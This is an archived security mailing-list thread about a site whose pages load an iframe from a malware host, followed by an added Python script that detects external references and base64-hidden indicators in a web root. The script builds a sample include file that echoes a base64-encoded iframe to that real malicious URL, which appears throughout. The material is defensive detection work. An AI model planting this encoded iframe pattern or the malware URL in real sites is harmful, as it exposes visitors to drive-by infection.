Security Basics mailing list archives

Re: There is a strange GET request header in all web pages of my site? I'm worried about a Trojan attack!
From: Henri Salo <henri () nerv fi>
Date: Thu, 8 Sep 2011 14:03:11 +0300

On Thu, Sep 08, 2011 at 12:01:19AM +0430, Ali Asghar Toraby Parizy wrote:
Hi.
Today I found that Kasper Anti Virus has blocked my site and tells
the clients that this site is affected by a Trojan.
On the other hand, I usually surf the Internet using Firefox. But today
I used IE to open my own site, and IE gives me the following warning:
"This page contains content that will not be delivered using a secure
HTTPS connection..."
I traced my site with the Fiddler debugging tool and I found that each
time I send a request to the site a GET request is made
to the following URL:
"http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"
I've searched for "carlos.c0m.li" on the Internet and I saw in
"Google Safe Browsing" something about that host at the following URL:
http://google.com/safebrowsing/diagnostic?site=carlos.c0m.li/
Google says that that host has malware. Please look at that report
and suggest a way to remove this bad thing from my site.
I've searched most of my public html directory, but I haven't found
any file that produces the following HTTP header. I have no idea. How can I
find that?


----- this is the header that Fiddler detects for every file that I open on my site:
GET /iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7 HTTP/1.1
Accept: application/x-ms-application, image/jpeg,
application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64;
Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; InfoPath.2; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: carlos.c0m.li


HTTP/1.1 404 Not Found
Date: Wed, 07 Sep 2011 18:42:02 GMT
Server: Apache/2
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Encoding: gzip
Content-Length: 233
Keep-Alive: timeout=1, max=100
Connection: Keep-Alive
Content-Type: text/html


Drive-by attack. I'll bet the link contained malicious JavaScript. You should try to investigate how they injected that code into your page. I can also help if you tell me your web page address.

Best regards,
Henri Salo
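The two checks a site owner would run at this point, as an added example that is not part of the thread: parse the page the server actually returns and list every resource it pulls from a host other than the site's own, then walk the web root (dotfiles included) looking for the indicator host both in clear text and inside base64 blobs, since a plain search of the public html directory misses the encoded form, which is one reason such a search comes up empty. The web root and the served page below are constructed for the example; the only value taken from the thread is the host seen in the Fiddler capture.

```python
"""Track down where an injected third-party reference comes from.

Added example, not code from the thread. The web root and served page are
constructed; INDICATOR_HOST is the host from the poster's Fiddler capture.
"""
import base64
import os
import re
import tempfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Host observed in the poster's Fiddler capture.
INDICATOR_HOST = "carlos.c0m.li"


class _RefCollector(HTMLParser):
    """Collect the load/submit target of tags that can reach another host."""

    WATCHED = {"iframe": "src", "script": "src", "img": "src",
               "link": "href", "object": "data", "embed": "src",
               "form": "action"}

    def __init__(self):
        super().__init__()
        self.refs = []

    def handle_starttag(self, tag, attrs):
        wanted = self.WATCHED.get(tag)
        if wanted is None:
            return
        for name, value in attrs:
            if name == wanted and value:
                self.refs.append((tag, value))


def external_references(html, site_host):
    """Return (tag, url) pairs that load from a host other than site_host."""
    parser = _RefCollector()
    parser.feed(html)
    found = []
    for tag, url in parser.refs:
        host = urlparse(url).hostname  # None for relative URLs
        if host and host.lower() != site_host.lower():
            found.append((tag, url))
    return found


# Runs of base64 alphabet long enough to hide a tag; shorter runs are noise.
_B64_RUN = re.compile(rb"[A-Za-z0-9+/]{40,}={0,2}")


def find_indicator(data, indicator=INDICATOR_HOST):
    """Return how the indicator appears in data: 'plain', 'base64', or both."""
    needle = indicator.encode()
    hits = []
    if needle in data:
        hits.append("plain")
    for blob in _B64_RUN.findall(data):
        try:
            decoded = base64.b64decode(blob, validate=True)
        except ValueError:  # not valid base64 after all
            continue
        if needle in decoded:
            hits.append("base64")
            break
    return hits


def scan_tree(root, indicator=INDICATOR_HOST):
    """Map relative path -> hit kinds for every file under root, dotfiles included."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = find_indicator(fh.read(), indicator)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_sample_tree():
    """Constructed web root: one include file carries the reference base64-encoded."""
    root = tempfile.mkdtemp(prefix="webroot_")
    os.makedirs(os.path.join(root, "includes"))
    injected = ('<iframe src="http://carlos.c0m.li/iframe.php'
                '?id=v4pfa24nw91yhoszkdmoh413ywv6cp7"></iframe>')
    encoded = base64.b64encode(injected.encode()).decode()
    files = {
        "index.php": "<?php include 'includes/footer.php'; ?>\n<html><body>Hi</body></html>\n",
        ".htaccess": "RewriteEngine On\n",
        "about.html": "<html><body>About us</body></html>\n",
        "includes/footer.php": "<?php echo base64_decode('" + encoded + "'); ?>\n",
    }
    for rel, text in files.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(text)
    return root


# Constructed copy of a page as the server returned it.
SERVED_PAGE = (
    '<html><head><link rel="stylesheet" href="/css/site.css"></head>'
    '<body><img src="https://www.example.com/logo.png">'
    '<iframe src="http://carlos.c0m.li/iframe.php?id=v4pfa24nw91yhoszkdmoh413ywv6cp7">'
    '</iframe></body></html>'
)

if __name__ == "__main__":
    for tag, url in external_references(SERVED_PAGE, "www.example.com"):
        print(f"external {tag}: {url}")
    for path, hits in scan_tree(build_sample_tree()).items():
        print(f"{path}: {', '.join(hits)}")
```

Run against a real site, `scan_tree` takes the web root path and `external_references` takes the HTML fetched through the proxy; anything reported as a base64 hit is a file a plain text search would never have shown, and `.htaccess` and include files are covered because `os.walk` does not skip dotfiles. Files that reference no external host and contain no encoded copy of it are not reported, so an empty result for the web root points at content stored elsewhere, such as the database or a compromised template outside the served tree.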

